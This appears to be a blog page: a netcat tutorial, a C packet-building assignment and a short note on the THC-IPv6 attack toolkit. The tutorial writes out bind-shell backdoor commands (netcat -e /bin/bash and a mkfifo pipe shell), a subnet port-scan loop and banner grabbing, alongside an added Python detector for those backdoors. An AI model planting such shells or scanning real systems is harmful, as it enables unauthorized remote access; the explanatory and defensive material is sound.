
Monday 22 October 2012

Ninja Fu With Netcat - Hacker's Swiss Army Knife

Netcat is one of my favorite tools for network investigations and backdoor planting. Netcat is a seemingly simple but very powerful and useful tool to read and write network connections using TCP or UDP. In this post, we will see several examples of using netcat in different scenarios.

First of all, if you use a distro like Ubuntu, it probably ships the OpenBSD netcat, which does not provide the very useful switch that lets us execute a command on connection. netcat-traditional offers this switch, so for learning purposes you should install the netcat-traditional package by issuing the command below on Ubuntu and its derivatives (however, beware of the inherent risk of this feature of the traditional netcat):

samar@samar-Techgaun:~$ sudo apt-get install netcat-traditional

Now you can use both the OpenBSD and traditional versions as nc.openbsd and nc.traditional respectively. However, the nc command might still be symbolically linked to nc.openbsd (via /etc/alternatives/nc). If you want nc to permanently refer to nc.traditional, type the following command (or do sudo rm /bin/nc && sudo ln -s /bin/nc.traditional /bin/nc):

samar@samar-Techgaun:~$ sudo update-alternatives --config nc

As I already said, netcat is a very useful tool for network-related work and hence is often referred to as the Hacker's Swiss Army Knife or the TCP/IP Swiss Army Knife. You can use netcat for several purposes such as file transfer, port scanning, listen servers, bind and reverse shells, backdoors, etc. Because of this, netcat has been a favorite tool of hackers for getting and maintaining access to servers.

Before beginning with the examples, I would like to point out that most of the time ports above 1024 are used to create listen servers with netcat. This is because ports below 1024 are reserved by the OS for core network services, and you cannot bind to them without special privileges on the system.

Simple Netcat Listen Server

samar@samar-Techgaun:~$ nc -lvp 1234
listening on [any] 1234 ...

Simple Netcat Client

samar@samar-Techgaun:~$ nc -vvn 1234
(UNKNOWN) [] 1234 (?) open

Once the client gets connected, the netcat listener might then look like this:

samar@samar-Techgaun:~$ nc -lvp 1234
listening on [any] 1234 ...
connect to [] from samar-Techgaun.local [] 38700

Notice the port 38700 at the end? This is the port the client uses to talk to the server. Observe that the value is much higher than 1024; such ports are known as ephemeral ports.

Once the client and server are connected, you can type anything and press ENTER. The data gets transmitted to the other end, which makes netcat a data transfer tool.

Open Raw Connection With Netcat as client

samar@samar-Techgaun:~$ nc -vv 80
Warning: inverse host lookup failed for Unknown host [] 80 (http) open
HEAD / HTTP/1.0\n\n

HTTP/1.1 200 OK
Date: Mon, 22 Oct 2012 04:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8

sent 21, rcvd 171

As seen above, I opened a raw connection to the host and then issued the HEAD / HTTP/1.0\n\n request to obtain the HTTP headers. You can also notice (see the web server version and PHP version?) that netcat can be used for basic fingerprinting and banner grabbing. Of course, this is not limited to HTTP fingerprinting; extend the idea to work with other services.

Web Server Example Using Netcat

samar@samar-Techgaun:~/Desktop/test$ { echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c < my_file)\r\n\r\n"; cat my_file; } | nc -lv -p 8080
listening on [any] 8080 ...

This example, taken from the wiki entry, works as a one-shot web server serving the content of my_file, which can be accessed from a web browser by visiting http://server:8080.
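As an added example (not from the original post), here are both exchanges above in Python: the one-shot web server's exact wire format, and a raw HEAD request whose reply is parsed for the Server and X-Powered-By headers the post points at. SAMPLE_RESPONSE is constructed from the headers shown above; the loopback server and all function names are my own.

```python
import socket
import threading
# Constructed sample: the header block the post got back from its Apache/PHP host.
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nDate: Mon, 22 Oct 2012 04:46:49 GMT\r\n"
                   b"Server: Apache/2.2.3 (CentOS)\r\nX-Powered-By: PHP/5.1.6\r\n"
                   b"Connection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n")

def build_one_shot_response(body: bytes) -> bytes:
    return b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n" % len(body) + body

def parse_http_response(raw: bytes) -> dict:
    """Split status line, headers (names lower-cased) and body out of a raw reply."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"status": lines[0], "headers": headers, "body": body}

def banner(parsed: dict) -> str:   # the fingerprint the post reads off by eye
    return " / ".join(parsed["headers"][k] for k in ("server", "x-powered-by") if k in parsed["headers"])

def serve_once(body: bytes, ready: threading.Event, port_box: list) -> None:
    # Loopback stand-in for `{ echo -ne ...; cat my_file; } | nc -lv -p 8080`: one accept, one reply.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind(("127.0.0.1", 0))            # port 0: the OS picks an ephemeral port
        srv.listen(1)
        port_box.append(srv.getsockname()[1])
        ready.set()
        conn, _ = srv.accept()
        with conn:
            conn.recv(4096)                   # nc never parses the request either
            conn.sendall(build_one_shot_response(body))

def head_request(host: str, port: int) -> dict:
    """Equivalent of typing `HEAD / HTTP/1.0` plus a blank line into `nc -vv host 80`."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
        raw = b""
        while (data := s.recv(4096)):
            raw += data
    return parse_http_response(raw)

if __name__ == "__main__":
    ready, box = threading.Event(), []
    threading.Thread(target=serve_once, args=(b"hello from my_file\n", ready, box)).start()
    ready.wait()
    print(banner(parse_http_response(SAMPLE_RESPONSE)), head_request("127.0.0.1", box[0]))
```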

File Transfer Using Netcat

To transfer a file from the server to the client, set up the server as below:

samar@samar-Techgaun:~$ cat my_file
samar@samar-Techgaun:~$ nc -lvp 1234 < my_file
listening on [any] 1234 ...

On the client end, do:

samar@samar-Techgaun:~$ nc -vv 1234 > output.txt
samar-Techgaun.local [] 1234 (?) open
^C sent 0, rcvd 10
samar@samar-Techgaun:~$ cat output.txt

Port Scanning With Netcat

samar@samar-Techgaun:~$ nc -nvz -w1 1-1024
(UNKNOWN) [] 80 (http) open
(UNKNOWN) [] 23 (telnet) open
(UNKNOWN) [] 21 (ftp) open

If you wish to scan a number of hosts (or a full network), you can do something like this:

samar@samar-Techgaun:~/Desktop/test$ for ip in $(seq 1 254); do nc -nvz -w1 192.168.1.$ip 1-1024; done

In the first example, ports 1-1024 are scanned on the host, and in the second example a class C network is scanned. However, netcat is by no means an advanced port scanner; tools such as nmap are much better suited for this job.

Spawn a process

The -e switch can be specified to spawn a process on the system. On the server, type the command below:

samar@samar-Techgaun:~$ nc -lv -p 1234 -e /bin/bash
listening on [any] 1234 ...

At the other end, you just connect to the newly started netcat service and then issue any command that bash recognizes. Good for shells on servers, isn't it?

samar@samar-Techgaun:~$ nc -vv 1234
samar-Techgaun.local [] 1234 (?) open

Netcat backdoor using mkfifo

Since the normal pipe (|) is not so reliable and works in a unidirectional fashion, Linux offers something called named pipes, which can be exploited to create an advanced backdoor on systems whose netcat does not support -e.

samar@samar-Techgaun:~$ mkfifo /tmp/b4ck; sh /tmp/b4ck | nc -lvp 1234 > /tmp/b4ck
listening on [any] 1234 ...

At the other end, you just need to connect to the newly created netcat service port:

samar@samar-Techgaun:~$ nc -vv 1234
localhost [] 1234 (?) open
sent 3, rcvd 33
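A defender's counterpart to the last two sections, added here and not part of the original post: a small check over constructed `ps -eo pid,ppid,args` output that flags the -e spawn and the mkfifo pattern described above. The process list, pids and severity labels are assumptions made for the sample; the heuristic for the FIFO variant is that the `sh /tmp/...` reader and the `nc -l ...` listener appear as siblings under the same parent shell.

```python
# Constructed sample of `ps -eo pid,ppid,args` on a host running the post's listeners:
SAMPLE_PS = """\
  PID  PPID ARGS
  812     1 /usr/sbin/sshd -D
 1234  1200 nc -lvp 1234
 1301  1200 nc -lv -p 1234 -e /bin/bash
 1422  1400 sh /tmp/b4ck
 1423  1400 nc -lvp 1234
 1510  1200 nc.traditional -vv 192.0.2.10 80
 1600  1200 /bin/bash
"""

NETCAT = {"nc", "netcat", "nc.traditional", "nc.openbsd", "ncat"}
SHELLS = {"sh", "bash", "dash"}

def parse_ps(text: str) -> list:
    """Turn the ps output into (pid, ppid, argv) tuples, skipping the header row."""
    procs = []
    for line in text.strip().splitlines()[1:]:
        pid, ppid, *argv = line.split()
        procs.append((int(pid), int(ppid), argv))
    return procs

def netcat_flags(argv: list) -> tuple:
    """(listening, execs, port) for a netcat argv; clusters like -lvp are expanded letter by letter."""
    letters = "".join(a[1:] for a in argv[1:] if a.startswith("-") and a[1:].isalpha())
    listening, execs, port = "l" in letters, "e" in letters or "c" in letters, None
    for i, a in enumerate(argv[1:], 1):          # port given -p style, as on this page
        if a.startswith("-") and a.endswith("p") and i + 1 < len(argv) and argv[i + 1].isdigit():
            port = int(argv[i + 1])
    return listening, execs, port

def findings(text: str) -> list:
    """Rank each suspicious process as (pid, severity, reason)."""
    procs, out, listeners = parse_ps(text), [], {}
    for pid, ppid, argv in procs:
        if argv[0].rsplit("/", 1)[-1] in NETCAT:
            listening, execs, port = netcat_flags(argv)
            if listening and execs:
                out.append((pid, "HIGH", f"netcat listener on {port} runs a program on connect (-e/-c)"))
            elif listening:
                out.append((pid, "MEDIUM", f"netcat listener on {port}"))
                listeners[ppid] = pid            # remember its parent for the FIFO check below
    for pid, ppid, argv in procs:
        # The mkfifo trick shows up as `sh /tmp/<fifo>` and `nc -l ...` siblings under one parent.
        if argv[0].rsplit("/", 1)[-1] in SHELLS and ppid in listeners and len(argv) > 1 and argv[1].startswith("/"):
            out.append((pid, "HIGH", f"shell reading {argv[1]} beside netcat listener pid {listeners[ppid]}: FIFO backdoor pattern"))
    return out
```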

I hope this post provides some direction on how to work with netcat and shows that netcat is called the TCP/IP Swiss Army Knife for a reason. There are several other possibilities with netcat. Explore to get more out of this awesome tool. ;)


Monday 20 August 2012

Build A Sample Custom Packet [Embedded Systems]

This code snippet was my submission for an embedded systems assignment from the Embedded Systems black book by Dr. K.V.K.K. Prasad. It is in no way a real packet and is not meant to represent the IP layer.

Question: Write a C program that takes the filename as input and generates packets of 100 bytes. Develop a simple packet format of your own.


gcc -Wall -o custom_packet custom_packet.c -lm

//eg: ./custom_packet /home/samar/Desktop/cs_rules.txt
//Compilation: gcc -Wall -o custom_packet custom_packet.c -lm   (-lm after the source so the linker sees ceil())
//Custom Packet: Header -> 20 bytes and Data -> 80 bytes
//Find me on

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <math.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

typedef struct {
        int8_t fragment_offset;
        int8_t ttl;
        int32_t source_ip;
        int32_t dest_ip;
} custom_packet_header;

typedef struct {
        custom_packet_header header;
        char data[80];
} custom_packet;

/* Returns the size of the file in bytes; exits if the file cannot be opened or stat'ed. */
long int get_file_size(char fname[])
{
        int fd;
        struct stat buf;
        long int count;
        if ((fd = open(fname, O_RDONLY)) == -1) {
                perror("Error reading the file");
                exit(1);
        }
        if (fstat(fd, &buf) == -1) {
                perror("Error stating the file");
                close(fd);
                exit(1);
        }
        count = (long int) buf.st_size;
        close(fd);
        return count;
}

/* Packs a dotted-quad address a.b.c.d into one 32-bit number. */
int decimalip2numeric(int a, int b, int c, int d)
{
        return (a * 16777216 + b * 65536 + c * 256 + d);
}

/* numericip2decimal(): the reverse conversion was left unfinished in the original submission. */

int main(int argc, char **argv)
{
        FILE *fp;
        //char fname[256];      //255 bytes is the limit of filename in extN filesystems
        custom_packet * packets;
        long int fsize;
        int num_of_packet, i;
        if (argc != 2) {
                printf("Usage: %s filename\n", argv[0]);
                return 1;
        }
        fsize = get_file_size(argv[1]);
        num_of_packet = ceil((double)fsize / 80.0);
        printf("%ld => %d", fsize, num_of_packet);
        if ((fp = fopen(argv[1], "rb")) == NULL) {
                perror("Error opening the file");
                return 1;
        }
        /* calloc zero-fills, so the data field of the last, partial packet is padded with NULs */
        packets = (custom_packet *) calloc(num_of_packet, sizeof(custom_packet));
        if (packets == NULL) {
                perror("Error allocating packets");
                fclose(fp);
                return 1;
        }
        for (i = 0; i < num_of_packet; i++) {
                packets[i].header.source_ip = decimalip2numeric(127, 0, 0, 1); //storing source ip as for now
                packets[i].header.dest_ip = decimalip2numeric(127, 0, 0, 1); //storing dest ip as for now
                packets[i].header.ttl = 127;
                packets[i].header.fragment_offset = i;
        }
        /* Fill each packet's 80-byte data field in turn. The original loop tested feof()
           before reading and never advanced i, so every read landed in packet 0. */
        for (i = 0; i < num_of_packet; i++) {
                if (fread((void *)packets[i].data, 1, 80, fp) == 0)
                        break;
        }
        fclose(fp);
        printf("\n\n----- Printing all the crafted packets -----\n\n");
        for (i = 0; i < num_of_packet; i++) {
                printf("[---- Packet Fragment no. %d ----", packets[i].header.fragment_offset);
                printf("\nSource IP -> %d\nDestination IP -> %d\nTime to live -> %d\n", packets[i].header.source_ip, packets[i].header.dest_ip, packets[i].header.ttl);
                printf("Packet data -> %.80s", packets[i].data);   // data is not NUL-terminated, so cap the width
                printf("\n---- End of Packet no. %d ----]\n\n", packets[i].header.fragment_offset);
        }
        free(packets);
        return 0;
}


Friday 19 August 2011

IPv6 Attacking Toolkit - THC-IPv6 Toolkit Released

The famous hacker group The Hacker's Choice (THC) has released a set of tools to attack the IPv6 protocol. IPv6 is the successor of the IPv4 protocol, proposed because of the exhaustion of the IPv4 address pool.

THC writes:

THC is proud to be the first who are releasing a comprehensive attack toolkit for the IPv6 protocol suite. It comprises state-of-the-art tools for alive scanning, man-in-the-middle attacks, denial-of-service etc. which exploit inherent vulnerabilities in IPv6. Included is a fast and easy to use packet crafting library to create your own attack tools.

For more information on the project, visit the THC IPv6 Project Page.
